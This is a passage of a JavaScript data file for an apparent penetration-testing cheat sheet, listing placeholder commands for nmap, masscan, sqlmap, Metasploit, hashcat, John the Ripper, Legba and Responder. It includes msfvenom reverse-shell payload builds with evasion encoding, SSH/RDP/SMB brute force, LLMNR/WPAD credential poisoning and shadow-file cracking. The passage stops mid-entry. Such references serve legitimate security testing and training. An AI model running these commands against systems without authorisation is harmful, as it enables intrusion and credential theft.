const SECTIONS = [
  {
    id: 'recon',
    emoji: '\u{1F50D}',
    title: 'Reconnaissance',
    commands: [
      { title: 'nmap — Basic scan', desc: 'Default scan on target IP', diff: 'easy', code: 'nmap <target>' },
      { title: 'nmap — TCP SYN scan', desc: 'Stealth scan without completing TCP handshake', diff: 'easy', code: 'nmap -sS <target>' },
      { title: 'nmap — Specific port', desc: 'Scan a single port', diff: 'easy', code: 'nmap -p <port> <target>' },
      { title: 'nmap — Port range', desc: 'Scan a range of ports', diff: 'easy', code: 'nmap -p <start>-<end> <target>' },
      { title: 'nmap — All ports', desc: 'Full 65535 port TCP scan', diff: 'medium', code: 'nmap -p- -sC -sV -T4 <target>' },
      { title: 'nmap — UDP scan', desc: 'Scan common UDP ports', diff: 'medium', code: 'nmap -sU --top-ports 100 <target>' },
      { title: 'nmap — Service detection', desc: 'Identify service versions on open ports', diff: 'easy', code: 'nmap -sV <target>' },
      { title: 'nmap — OS detection', desc: 'Determine target operating system', diff: 'medium', code: 'nmap -O <target>' },
      { title: 'nmap — Aggressive scan', desc: 'OS + version + scripts + traceroute', diff: 'medium', code: 'nmap -A <target>' },
      { title: 'nmap — Ping sweep', desc: 'Discover live hosts on subnet', diff: 'easy', code: 'nmap -sn <subnet>' },
      { title: 'nmap — Scan subnet', desc: 'Scan all devices in CIDR range', diff: 'easy', code: 'nmap <subnet>' },
      { title: 'nmap — Multiple hosts', desc: 'Scan several targets at once', diff: 'easy', code: 'nmap <target1> <target2>' },
      { title: 'nmap — Verbose output', desc: 'Detailed scan progress', diff: 'easy', code: 'nmap -v <target>' },
      { title: 'nmap — NSE script', desc: 'Run a specific NSE script', diff: 'medium', code: 'nmap --script <script> <target>' },
      { title: 'nmap — Save TXT', desc: 'Save output to text file', diff: 'easy', code: 'nmap -oN <output> <target>' },
      { title: 'nmap — Save XML', desc: 'Save output to XML file', diff: 'easy', code: 'nmap -oX <output> <target>' },
      { title: 'nmap — All formats', desc: 'Normal, XML, grepable at once', diff: 'easy', code: 'nmap -oA <output> <target>' },
      { title: 'nmap — Timing template', desc: 'Aggressive timing (fast scan)', diff: 'easy', code: 'nmap -T4 <target>' },
      { title: 'nmap — Firewall bypass', desc: 'Skip host discovery (assume host is up)', diff: 'medium', code: 'nmap -Pn <target>' },
      { title: 'nmap — Randomize hosts', desc: 'Scan hosts in random order to evade detection', diff: 'hard', code: 'nmap --randomize-hosts <subnet>' },
      { title: 'nmap — Exclude hosts', desc: 'Exclude specific IPs from scan', diff: 'easy', code: 'nmap --exclude <exclude_ip> <subnet>' },
      { title: 'nmap — Traceroute', desc: 'Show packet route to target', diff: 'medium', code: 'nmap --traceroute <target>' },
      { title: 'nmap — OS fingerprint', desc: 'Combine OS + service version detection', diff: 'medium', code: 'nmap -O -sV <target>' },
      { title: 'nmap — DNS enumeration', desc: 'List hosts without scanning them', diff: 'medium', code: 'nmap -sL <subnet>' },
      { title: 'nmap — Version all', desc: 'Detect all possible services aggressively', diff: 'hard', code: 'nmap -sV --version-all <target>' },
      { title: 'dnsrecon', desc: 'DNS enumeration', diff: null, code: 'dnsrecon -d <domain>' },
      { title: 'dig — TXT records', desc: 'Check SPF, DKIM, DMARC', diff: null, code: 'dig <domain> TXT' },
      { title: 'tls-scan — Single target', desc: 'Extract TLS cert metadata from IP', diff: 'medium', code: 'tls-scan -a <target> -p 443' },
      { title: 'tls-scan — Save output', desc: 'Save certificate data to JSONL', diff: 'medium', code: 'tls-scan -a <target> -p 443 -o <output>' },
      { title: 'tls-scan — From file', desc: 'Scan IPs from a list file', diff: 'medium', code: 'tls-scan -i <input_file> -o <output>' },
      { title: 'tls-scan — Port range', desc: 'Scan multiple TLS ports', diff: 'hard', code: 'tls-scan -a <target> -p 443 8443 993' },
      { title: 'tls-scan — CIDR range', desc: 'Scan entire subnet', diff: 'hard', code: 'tls-scan -a <subnet> -p 443 -o <output>' },
      { title: 'tls-scan — Custom timeout', desc: 'Adjust socket timeout', diff: 'medium', code: 'tls-scan -a <target> -p 443 -t 5 -o <output>' },
      { title: 'tls-scan — More workers', desc: 'Increase parallel threads', diff: 'medium', code: 'tls-scan -a <subnet> -p 443 -w 256 -o <output>' },
    ]
  },
  {
    id: 'scanning',
    emoji: '\u{1F4E1}',
    title: 'Scanning & Enumeration',
    commands: [
      { title: 'gobuster — Directory bruteforce', desc: 'Common web directories', diff: null, code: 'gobuster dir -u <url> -w /usr/share/wordlists/dirb/common.txt' },
      { title: 'gobuster — Subdomains', desc: 'DNS subdomain enumeration', diff: null, code: 'gobuster dns -d <domain> -w <wordlist>' },
      { title: 'ffuf — Fast web fuzzing', desc: 'Directory busting with filters', diff: null, code: 'ffuf -u <url>/FUZZ -w <wordlist> -mc 200,301,302' },
      { title: 'ffuf — Recursive', desc: 'Deep directory bruteforce', diff: 'medium', code: 'ffuf -recursion -recursion-depth 3 -u <url>/FUZZ -w <wordlist>' },
      { title: 'nikto', desc: 'Web server vulnerability scan', diff: null, code: 'nikto -h <target>' },
      { title: 'whatweb', desc: 'CMS, framework, version detection', diff: null, code: 'whatweb <url>' },
      { title: 'wpscan', desc: 'WordPress vulnerability scanner', diff: null, code: 'wpscan --url <url> --enumerate' },
      { title: 'masscan — Basic port scan', desc: 'Single port on target', diff: 'easy', code: 'masscan <target> -p <port>' },
      { title: 'masscan — Multiple ports', desc: 'Scan specific ports', diff: 'easy', code: 'masscan <target> -p <port1>,<port2>,<port3>' },
      { title: 'masscan — Port range', desc: 'Scan a range of ports', diff: 'easy', code: 'masscan <target> -p <start>-<end>' },
      { title: 'masscan — Subnet', desc: 'Scan subnet for specific port', diff: 'easy', code: 'masscan <subnet> -p <port>' },
      { title: 'masscan — All ports', desc: 'Full 65535 TCP port scan', diff: 'medium', code: 'masscan <target> -p 0-65535' },
      { title: 'masscan — Set rate', desc: 'Control packets per second', diff: 'medium', code: 'masscan <subnet> -p <port> --rate <rate>' },
      { title: 'masscan — Banner grab', desc: 'Retrieve service banners', diff: 'medium', code: 'masscan <subnet> -p <port> --banners' },
      { title: 'masscan — Save TXT', desc: 'List format output', diff: 'easy', code: 'masscan <subnet> -p <port> -oL <output>' },
      { title: 'masscan — Save XML', desc: 'XML output', diff: 'easy', code: 'masscan <subnet> -p <port> -oX <output>' },
      { title: 'masscan — Save JSON', desc: 'JSON output', diff: 'easy', code: 'masscan <subnet> -p <port> -oJ <output>' },
      { title: 'masscan — Save grepable', desc: 'Grepable output', diff: 'easy', code: 'masscan <subnet> -p <port> -oG <output>' },
      { title: 'masscan — Exclude IP', desc: 'Skip specific target', diff: 'easy', code: 'masscan <subnet> -p <port> --exclude <exclude_ip>' },
      { title: 'masscan — Exclude file', desc: 'Exclude IPs from file', diff: 'medium', code: 'masscan <subnet> -p <port> --excludefile <file>' },
      { title: 'masscan — Interface', desc: 'Bind to specific NIC', diff: 'medium', code: 'masscan <subnet> -p <port> -e <interface>' },
      { title: 'masscan — Source IP', desc: 'Spoof source address', diff: 'hard', code: 'masscan <subnet> -p <port> --source-ip <ip>' },
      { title: 'masscan — Randomize', desc: 'Randomize target order', diff: 'medium', code: 'masscan <subnet> -p <port> --randomize-hosts' },
      { title: 'masscan — Config file', desc: 'Load scan configuration', diff: 'medium', code: 'masscan -c <config>' },
      { title: 'masscan — Resume scan', desc: 'Resume paused scan', diff: 'medium', code: 'masscan --resume <config>' },
      { title: 'masscan — ICMP ping', desc: 'Discover live hosts', diff: 'easy', code: 'masscan <subnet> --ping' },
      { title: 'masscan — Open only', desc: 'Show only open ports', diff: 'easy', code: 'masscan <subnet> -p <port> --open-only' },
      { title: 'masscan — Retries', desc: 'Set retry count for probes', diff: 'medium', code: 'masscan <subnet> -p <port> --retries <count>' },
    ]
  },
  {
    id: 'web',
    emoji: '\u{1F310}',
    title: 'Web Exploitation',
    commands: [
      { title: 'sqlmap — Basic', desc: 'Auto-detect and exploit SQLi', diff: null, code: 'sqlmap -u "<url>?param=1" --batch' },
      { title: 'sqlmap — Dump database', desc: 'Extract all tables', diff: null, code: 'sqlmap -u "<url>?param=1" --dump --batch' },
      { title: 'curl — Basic request', desc: 'View response headers and body', diff: null, code: 'curl -iv <url>' },
      { title: 'curl — POST with data', desc: 'Send form/data to endpoint', diff: null, code: 'curl -X POST -d "user=admin&pass=test" <url>' },
      { title: 'curl — Custom headers', desc: 'Add auth cookies, user-agent', diff: null, code: 'curl -H "Authorization: Bearer <token>" -H "User-Agent: Mozilla/5.0" <url>' },
    ]
  },
  {
    id: 'exploit',
    emoji: '\u{1F5A5}',
    title: 'Exploitation Frameworks',
    commands: [
      { title: 'msfconsole — Start', desc: 'Launch Metasploit Framework', diff: 'easy', code: 'msfconsole' },
      { title: 'msfconsole — Start (quiet)', desc: 'Launch without banner', diff: 'easy', code: 'msfconsole -q' },
      { title: 'msfconsole — Search exploits', desc: 'Find modules by keyword', diff: 'easy', code: 'search <keyword>' },
      { title: 'msfconsole — Search with type', desc: 'Filter by module type', diff: 'medium', code: 'search type:exploit name:<keyword>' },
      { title: 'msfconsole — Use module', desc: 'Select exploit/aux module', diff: 'easy', code: 'use <module_path>' },
      { title: 'msfconsole — Show options', desc: 'View module parameters', diff: 'easy', code: 'show options' },
      { title: 'msfconsole — Set option', desc: 'Configure module parameter', diff: 'easy', code: 'set <option> <value>' },
      { title: 'msfconsole — Set global', desc: 'Set option across all modules', diff: 'medium', code: 'setg <option> <value>' },
      { title: 'msfconsole — Unset global', desc: 'Remove global variable', diff: 'medium', code: 'unsetg <option>' },
      { title: 'msfconsole — Set RHOSTS', desc: 'Define target IP', diff: 'easy', code: 'set RHOSTS <target>' },
      { title: 'msfconsole — Set RPORT', desc: 'Define target port', diff: 'easy', code: 'set RPORT <port>' },
      { title: 'msfconsole — Set payload', desc: 'Choose payload to deliver', diff: 'medium', code: 'set PAYLOAD <payload_path>' },
      { title: 'msfconsole — Set LHOST', desc: 'Local IP for reverse connection', diff: 'easy', code: 'set LHOST <ip>' },
      { title: 'msfconsole — Set LPORT', desc: 'Local port for callback', diff: 'easy', code: 'set LPORT <port>' },
      { title: 'msfconsole — Run exploit', desc: 'Execute the selected module', diff: 'easy', code: 'run' },
      { title: 'msfconsole — Check target', desc: 'Test if target is vulnerable', diff: 'medium', code: 'check' },
      { title: 'msfconsole — Show payloads', desc: 'List compatible payloads', diff: 'medium', code: 'show payloads' },
      { title: 'msfconsole — Show encoders', desc: 'List available encoders', diff: 'medium', code: 'show encoders' },
      { title: 'msfconsole — Show auxiliary', desc: 'List auxiliary modules', diff: 'medium', code: 'show auxiliary' },
      { title: 'msfconsole — Show post', desc: 'List post-exploitation modules', diff: 'medium', code: 'show post' },
      { title: 'msfconsole — Sessions list', desc: 'View all active sessions', diff: 'easy', code: 'sessions -l' },
      { title: 'msfconsole — Interact session', desc: 'Connect to session by ID', diff: 'easy', code: 'sessions -i <session_id>' },
      { title: 'msfconsole — Kill session', desc: 'Terminate session', diff: 'medium', code: 'sessions -k <session_id>' },
      { title: 'msfconsole — Background session', desc: 'Send session to background', diff: 'medium', code: 'background' },
      { title: 'msfconsole — Run post module', desc: 'Execute post-exploit module', diff: 'hard', code: 'run <post_module_path>' },
      { title: 'msfconsole — Add route', desc: 'Route traffic through session for pivoting', diff: 'hard', code: 'route add <subnet> <session_id>' },
      { title: 'msfconsole — Show routes', desc: 'Display active pivot routes', diff: 'medium', code: 'route' },
      { title: 'msfconsole — Set session pivot', desc: 'Route through existing session', diff: 'hard', code: 'setg SESSION <session_id>' },
      { title: 'msfconsole — Exit', desc: 'Close Metasploit', diff: 'easy', code: 'exit' },
      { title: 'msfvenom — List payloads', desc: 'Show all available payloads', diff: 'easy', code: 'msfvenom -l payloads' },
      { title: 'msfvenom — List encoders', desc: 'Show available encoders', diff: 'easy', code: 'msfvenom -l encoders' },
      { title: 'msfvenom — List formats', desc: 'Show output format options', diff: 'easy', code: 'msfvenom -l formats' },
      { title: 'msfvenom — List platforms', desc: 'Show target platform options', diff: 'easy', code: 'msfvenom -l platforms' },
      { title: 'msfvenom — List archs', desc: 'Show architecture options', diff: 'easy', code: 'msfvenom -l archs' },
      { title: 'msfvenom — Encode payload', desc: 'Encode with iterations for evasion', diff: 'hard', code: 'msfvenom -p <payload> LHOST=<ip> LPORT=<port> -e <encoder> -i <iterations> -f <format> -o <output>' },
      { title: 'msfvenom — Specify platform', desc: 'Set target OS for payload', diff: 'medium', code: 'msfvenom -p <payload> --platform <platform> -a <arch> LHOST=<ip> LPORT=<port> -f <format> -o <output>' },
      { title: 'msfvenom — Linux reverse shell', desc: 'Generate Linux ELF payload', diff: 'medium', code: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf -o <output>' },
      { title: 'msfvenom — Windows meterpreter', desc: 'Windows reverse meterpreter', diff: 'medium', code: 'msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o <output>' },
      { title: 'msfvenom — Web PHP shell', desc: 'PHP reverse shell', diff: 'medium', code: 'msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'msfvenom — Python payload', desc: 'Python reverse shell', diff: 'medium', code: 'msfvenom -p python/shell_reverse_tcp LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'msfvenom — macOS payload', desc: 'macOS reverse shell', diff: 'hard', code: 'msfvenom -p osx/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho -o <output>' },
      { title: 'msfvenom — Android payload', desc: 'Android APK meterpreter', diff: 'hard', code: 'msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -o <output>' },
      { title: 'searchsploit', desc: 'Search Exploit-DB locally', diff: null, code: 'searchsploit <keyword>' },
    ]
  },
  {
    id: 'password',
    emoji: '\u{1F511}',
    title: 'Password Cracking',
    commands: [
      { title: 'hashcat — Dictionary attack', desc: 'MD5 with wordlist (-a 0)', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — Brute force', desc: 'Exhaustive mask attack (-a 3)', diff: 'hard', code: 'hashcat -m <hash_type> -a 3 <hashes> <mask>' },
      { title: 'hashcat — Combination', desc: 'Combine two wordlists (-a 1)', diff: 'hard', code: 'hashcat -m <hash_type> -a 1 <hashes> <wordlist1> <wordlist2>' },
      { title: 'hashcat — Rule-based', desc: 'Dictionary with mangling rules', diff: 'hard', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> -r <rule_file>' },
      { title: 'hashcat — Hybrid wordlist+mask', desc: 'Wordlist + mask suffix (-a 6)', diff: 'hard', code: 'hashcat -m <hash_type> -a 6 <hashes> <wordlist> <mask>' },
      { title: 'hashcat — NTLM', desc: 'Windows NTLM hash (-m 1000)', diff: 'medium', code: 'hashcat -m 1000 -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — bcrypt', desc: 'Slow hash, low speed (-m 3200)', diff: 'hard', code: 'hashcat -m 3200 -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — MD5', desc: 'MD5 hash (-m 0)', diff: 'easy', code: 'hashcat -m 0 -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — SHA1', desc: 'SHA1 hash (-m 100)', diff: 'medium', code: 'hashcat -m 100 -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — SHA256', desc: 'SHA256 hash (-m 1400)', diff: 'medium', code: 'hashcat -m 1400 -a 0 <hashes> <wordlist>' },
      { title: 'hashcat — Show cracked', desc: 'Display previously cracked hashes', diff: 'easy', code: 'hashcat -m <hash_type> <hashes> --show' },
      { title: 'hashcat — Benchmark', desc: 'Speed test for hash mode', diff: 'easy', code: 'hashcat -b -m <hash_type>' },
      { title: 'hashcat — Session save', desc: 'Name session for later resume', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --session=<name>' },
      { title: 'hashcat — Resume session', desc: 'Restore saved session', diff: 'medium', code: 'hashcat --session=<name> --restore' },
      { title: 'hashcat — Increment mode', desc: 'Try shorter masks first', diff: 'hard', code: 'hashcat -m <hash_type> -a 3 <hashes> <mask> --increment' },
      { title: 'hashcat — Custom charset', desc: 'Define custom character set (-1)', diff: 'hard', code: 'hashcat -m <hash_type> -a 3 <hashes> -1 <charset> <mask>' },
      { title: 'hashcat — Save output', desc: 'Write cracked to file (-o)', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> -o <output>' },
      { title: 'hashcat — Remove cracked', desc: 'Show only uncracked hashes', diff: 'medium', code: 'hashcat -m <hash_type> <hashes> --show --left' },
      { title: 'hashcat — Workload', desc: 'Set performance profile (-w)', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> -w <level>' },
      { title: 'hashcat — Force', desc: 'Override warnings and errors', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --force' },
      { title: 'hashcat — Quiet mode', desc: 'Suppress status output', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --quiet' },
      { title: 'hashcat — Status timer', desc: 'Status update interval in seconds', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --status-timer=<seconds>' },
      { title: 'hashcat — GPU select', desc: 'Use specific GPU device (-d)', diff: 'hard', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> -d <device_id>' },
      { title: 'hashcat — Potfile disable', desc: 'Skip potfile reads/writes', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --potfile-disable' },
      { title: 'hashcat — Runtime limit', desc: 'Max cracking time in seconds', diff: 'medium', code: 'hashcat -m <hash_type> -a 0 <hashes> <wordlist> --runtime=<seconds>' },
      { title: 'hashcat — Example hashes', desc: 'Show sample hashes for mode', diff: 'easy', code: 'hashcat -m <hash_type> --example-hashes' },
      { title: 'hashcat — Version', desc: 'Display version info', diff: 'easy', code: 'hashcat --version' },
    ]
  },
  {
    id: 'cewl',
    emoji: '\u{1F575}',
    title: 'Password — CeWL (Custom Wordlist Generator)',
    commands: [
      { title: 'cewl — Basic crawl', desc: 'Generate wordlist from website', diff: 'easy', code: 'cewl <url>' },
      { title: 'cewl — Save wordlist', desc: 'Write extracted words to file', diff: 'easy', code: 'cewl <url> -w <output>' },
      { title: 'cewl — Crawl depth', desc: 'Set spider depth (default 2)', diff: 'medium', code: 'cewl <url> -d <depth>' },
      { title: 'cewl — Min word length', desc: 'Set minimum word length', diff: 'easy', code: 'cewl <url> -m <length>' },
      { title: 'cewl — Max word length', desc: 'Set maximum word length', diff: 'medium', code: 'cewl <url> -x <length>' },
      { title: 'cewl — Include emails', desc: 'Extract email addresses', diff: 'medium', code: 'cewl <url> -e' },
      { title: 'cewl — Save emails', desc: 'Write emails to separate file', diff: 'medium', code: 'cewl <url> -e --email_file <output>' },
      { title: 'cewl — Word counts', desc: 'Show frequency of each word', diff: 'medium', code: 'cewl <url> -c' },
      { title: 'cewl — Lowercase', desc: 'Convert all words to lowercase', diff: 'easy', code: 'cewl <url> --lowercase' },
      { title: 'cewl — Include numbers', desc: 'Include words with numbers', diff: 'medium', code: 'cewl <url> --with-numbers' },
      { title: 'cewl — Unique only', desc: 'Remove duplicate words', diff: 'easy', code: 'cewl <url> --uniq' },
      { title: 'cewl — Extract metadata', desc: 'Parse PDF/Office document metadata', diff: 'hard', code: 'cewl <url> --meta' },
      { title: 'cewl — Download files', desc: 'Download discovered documents', diff: 'hard', code: 'cewl <url> --download' },
      { title: 'cewl — Follow external', desc: 'Crawl offsite links', diff: 'hard', code: 'cewl <url> -o' },
      { title: 'cewl — Request delay', desc: 'Wait between requests', diff: 'medium', code: 'cewl <url> --delay <seconds>' },
      { title: 'cewl — Verbose', desc: 'Detailed crawl output', diff: 'medium', code: 'cewl <url> -v' },
      { title: 'cewl — Proxy', desc: 'Route through HTTP proxy', diff: 'hard', code: 'cewl <url> --proxy_host <ip> --proxy_port <port>' },
      { title: 'cewl — Auth basic', desc: 'Authenticated crawl', diff: 'hard', code: 'cewl <url> --auth_type basic --auth_user <user> --auth_pass <pass>' },
      { title: 'cewl — Custom UA', desc: 'Set custom User-Agent', diff: 'medium', code: 'cewl <url> -u "<ua>"' },
    ]
  },
  {
    id: 'legba',
    emoji: '\u{1F510}',
    title: 'Password — Legba (Multi-Protocol Brute Force)',
    commands: [
      { title: 'legba — HTTP login', desc: 'Brute-force HTTP login form', diff: 'medium', code: 'legba http -T <url> -U <user> -P <password_file>' },
      { title: 'legba — Combos file', desc: 'Use user:pass combos file (-C)', diff: 'medium', code: 'legba http -T <url> -C <combos_file>' },
      { title: 'legba — HTTP POST form', desc: 'Custom POST form brute-force', diff: 'hard', code: 'legba http -T <url> --http-method POST --http-payload "Username={{USERNAME}}&Password={{PASSWORD}}" --http-success "status == 302" -U <user_file> -P <password_file>' },
      { title: 'legba — HTTP Basic Auth', desc: 'Brute-force HTTP Basic Auth', diff: 'medium', code: 'legba http-basic -T <target> -U <user> -P <password_file>' },
      { title: 'legba — SSH', desc: 'Brute-force SSH password', diff: 'medium', code: 'legba ssh -T <target> -U <user> -P <password_file>' },
      { title: 'legba — FTP', desc: 'Brute-force FTP credentials', diff: 'medium', code: 'legba ftp -T <target> -U <user> -P <password_file>' },
      { title: 'legba — SMB', desc: 'Brute-force SMB authentication', diff: 'medium', code: 'legba smb -T <target> -U <user> -P <password_file>' },
      { title: 'legba — RDP', desc: 'Brute-force Remote Desktop', diff: 'hard', code: 'legba rdp -T <target> -U <user> -P <password_file>' },
      { title: 'legba — LDAP', desc: 'Brute-force LDAP bind', diff: 'hard', code: 'legba ldap -T <target> -U <user> -P <password_file>' },
      { title: 'legba — Verbose', desc: 'Detailed progress output', diff: 'medium', code: 'legba http -T <url> -U <user> -P <password_file> -v' },
      { title: 'legba — Concurrency', desc: 'Set thread count for speed', diff: 'medium', code: 'legba http -T <url> -U <user> -P <password_file> --concurrency <threads>' },
      { title: 'legba — Stop on success', desc: 'Exit after first valid credential', diff: 'medium', code: 'legba http -T <url> -U <user> -P <password_file> --single-match' },
      { title: 'legba — Custom failure', desc: 'Detect failure by response text', diff: 'hard', code: 'legba http -T <url> --http-success "status != 200" -U <user> -P <password_file>' },
      { title: 'legba — Save output', desc: 'Write results to file', diff: 'medium', code: 'legba http -T <url> -U <user> -P <password_file> -O <output>' },
      { title: 'legba — Proxy', desc: 'Route through Burp/socks proxy', diff: 'hard', code: 'legba http -T <url> -U <user> -P <password_file> --proxy http://<ip>:<port>' },
      { title: 'legba — Rate limit delay', desc: 'Add delay between attempts', diff: 'hard', code: 'legba ssh -T <target> -U <user> -P <password_file> -W <milliseconds>' },
      { title: 'legba — Resume session', desc: 'Continue interrupted attack', diff: 'hard', code: 'legba ssh --resume <session_file>' },
    ]
  },
  {
    id: 'john',
    emoji: '\u{1F511}',
    title: 'Password — John the Ripper',
    commands: [
      { title: 'john — Wordlist mode', desc: 'Crack hashes with wordlist', diff: 'medium', code: 'john --wordlist=<wordlist> <hashfile>' },
      { title: 'john — Rules enabled', desc: 'Wordlist with mangling rules', diff: 'hard', code: 'john --rules --wordlist=<wordlist> <hashfile>' },
      { title: 'john — Single crack', desc: 'Single crack mode (login-based)', diff: 'hard', code: 'john --single <hashfile>' },
      { title: 'john — Incremental', desc: 'Brute-force all combos', diff: 'hard', code: 'john --incremental <hashfile>' },
      { title: 'john — Incremental digits', desc: 'Numeric-only brute force', diff: 'hard', code: 'john --incremental=Digits <hashfile>' },
      { title: 'john — Mask attack', desc: 'Custom pattern mask', diff: 'hard', code: 'john --mask=<mask> <hashfile>' },
      { title: 'john — Show cracked', desc: 'Display cracked passwords', diff: 'easy', code: 'john --show <hashfile>' },
      { title: 'john — Session save', desc: 'Name session for resume', diff: 'medium', code: 'john --session=<name> <hashfile>' },
      { title: 'john — Restore session', desc: 'Resume saved session', diff: 'medium', code: 'john --restore=<name>' },
      { title: 'john — Session status', desc: 'Check session progress', diff: 'medium', code: 'john --status=<name>' },
      { title: 'john — Fork (parallel)', desc: 'Run N parallel processes', diff: 'hard', code: 'john --fork=<N> <hashfile>' },
      { title: 'john — Format list', desc: 'List supported hash formats', diff: 'easy', code: 'john --list=formats' },
      { title: 'john — Format search', desc: 'Find specific hash format', diff: 'medium', code: 'john --list=formats | grep -i <keyword>' },
      { title: 'john — NTLM', desc: 'Crack Windows NTLM hash', diff: 'medium', code: 'john --format=NT --wordlist=<wordlist> <hashfile>' },
      { title: 'john — LM', desc: 'Crack Windows LM hash', diff: 'medium', code: 'john --format=LM --wordlist=<wordlist> <hashfile>' },
      { title: 'john — Linux crypt', desc: 'Crack Linux /etc/shadow', diff: 'hard', code: 'john --format=crypt --wordlist=<wordlist> <hashfile>' },
      { title: 'john — unshadow', desc: 'Merge passwd + shadow for cracking', diff: 'hard', code: [
        'unshadow <passwd> <shadow> > <output>',
        'john --wordlist=<wordlist> <output>',
      ]},
      { title: 'john — zip2john', desc: 'Extract hash from encrypted ZIP', diff: 'hard', code: [
        'zip2john <file>.zip > <hash_output>',
        'john --wordlist=<wordlist> <hash_output>',
        'unzip <file>.zip',
      ]},
      { title: 'john — rar2john', desc: 'Extract hash from encrypted RAR', diff: 'hard', code: [
        'rar2john <file>.rar > <hash_output>',
        'john --wordlist=<wordlist> <hash_output>',
        'unrar x <file>.rar',
      ]},
      { title: 'john — ssh2john', desc: 'Crack SSH private key passphrase', diff: 'hard', code: [
        'ssh2john.py <id_rsa> > <hash_output>',
        'john --wordlist=<wordlist> <hash_output>',
      ]},
      { title: 'john — pdf2john', desc: 'Extract hash from encrypted PDF', diff: 'hard', code: [
        'pdf2john <file>.pdf > <hash_output>',
        'john --wordlist=<wordlist> <hash_output>',
      ]},
      { title: 'john — office2john', desc: 'Extract hash from encrypted Excel/Office', diff: 'hard', code: [
        'office2john.py <file>.xlsx > <hash_output>',
        'john --wordlist=<wordlist> <hash_output>',
      ]},
    ]
  },
  {
    id: 'responder',
    emoji: '\u{1F4E1}',
    title: 'Network — Responder (LLMNR/NBT-NS Poisoning)',
    commands: [
      { title: 'responder — Basic', desc: 'Start poisoning on interface', diff: 'hard', code: 'responder -I <interface>' },
      { title: 'responder — Analyze mode', desc: 'Monitor without poisoning', diff: 'medium', code: 'responder -I <interface> -A' },
      { title: 'responder — WPAD proxy', desc: 'Enable rogue WPAD proxy server', diff: 'hard', code: 'responder -I <interface> -w' },
      { title: 'responder — Force WPAD auth', desc: 'Force WPAD authentication capture', diff: 'hard', code: 'responder -I <interface> -w -F' },
      { title: 'responder — Disable SMB', desc: 'Turn off SMB server module', diff: 'medium', code: 'responder -I <interface> --disable-smb' },
      { title: 'responder — Disable HTTP', desc: 'Turn off HTTP server module', diff: 'medium', code: 'responder -I <interface> --disable-http' },
      { title: 'responder — Fingerprinting', desc: 'Enable OS/host fingerprinting', diff: 'hard', code: 'responder -I <interface> -f' },
      { title: 'responder — Verbose', desc: 'Detailed runtime output', diff: 'medium', code: 'responder -I <interface> -v' },
      { title: 'responder — Log directory', desc: 'Custom log path', diff: 'medium', code: 'responder -I <interface> -o <path>' },
      { title: 'responder — All interfaces', desc: 'Listen on every interface', diff: 'hard', code: 'responder -I all' },
      { title: 'responder — DHCP poison', desc: 'Enable DHCP poisoning', diff: 'hard', code: 'responder -I <interface> -d' },
      { title: 'responder — Custom challenge', desc: 'Set custom NTLM challenge', diff: 'hard', code: 'responder -I <interface> --challenge <hex>' },
      { title: 'responder — LM downgrade', desc: 'Force LM hash downgrade', diff: 'hard', code: 'responder -I <interface> --lm' },
      { title: 'responder — Disable NBT-NS', desc: 'Disable NBT-NS poisoning', diff: 'medium', code: 'responder -I <interface> --disable-nbt' },
      { title: 'responder — Disable mDNS', desc: 'Disable multicast DNS', diff: 'medium', code: 'responder -I <interface> --disable-mdns' },
      { title: 'responder — Redirect domain', desc: 'Target specific domain', diff: 'hard', code: 'responder -I <interface> -r <domain>' },
    ]
  },
  {
    id: 'smbeagle',
    emoji: '\u{1F4E1}',
    title: 'Network — SMBeagle (SMB Enumeration)',
    commands: [
      { title: 'smbeagle — Subnet scan', desc: 'Scan subnet for SMB hosts', diff: 'medium', code: 'smbeagle <subnet>' },
      { title: 'smbeagle — Single host', desc: 'Enumerate SMB on target', diff: 'easy', code: 'smbeagle <target>' },
      { title: 'smbeagle — Specify port', desc: 'Target custom SMB port', diff: 'medium', code: 'smbeagle -p <port> <target>' },
      { title: 'smbeagle — Verbose', desc: 'Detailed share/user/OS info', diff: 'medium', code: 'smbeagle -v <target>' },
      { title: 'smbeagle — Aggressive', desc: 'Deep shares + permissions + sessions', diff: 'hard', code: 'smbeagle -a <target>' },
      { title: 'smbeagle — Null session', desc: 'Check anonymous SMB access', diff: 'hard', code: 'smbeagle --null <target>' },
      { title: 'smbeagle — Authenticated', desc: 'Scan with credentials', diff: 'hard', code: 'smbeagle -u <user> -p <pass> <target>' },
      { title: 'smbeagle — Domain auth', desc: 'Authenticate against domain', diff: 'hard', code: 'smbeagle -d <domain> -u <user> -p <pass> <target>' },
      { title: 'smbeagle — List shares', desc: 'Enumerate SMB shares only', diff: 'medium', code: 'smbeagle --shares <target>' },
      { title: 'smbeagle — User enum', desc: 'Extract SMB/AD users', diff: 'hard', code: 'smbeagle --users <target>' },
      { title: 'smbeagle — Save output', desc: 'Write results to file', diff: 'medium', code: 'smbeagle -o <output> <target>' },
      { title: 'smbeagle — JSON output', desc: 'Machine-readable format', diff: 'medium', code: 'smbeagle --json <target>' },
      { title: 'smbeagle — Stealth mode', desc: 'Delay between probes', diff: 'hard', code: 'smbeagle --delay <seconds> <target>' },
      { title: 'smbeagle — SMB version', desc: 'Detect SMB1/2/3 support', diff: 'medium', code: 'smbeagle --smb-version <target>' },
    ]
  },
  {
    id: 'msolspray',
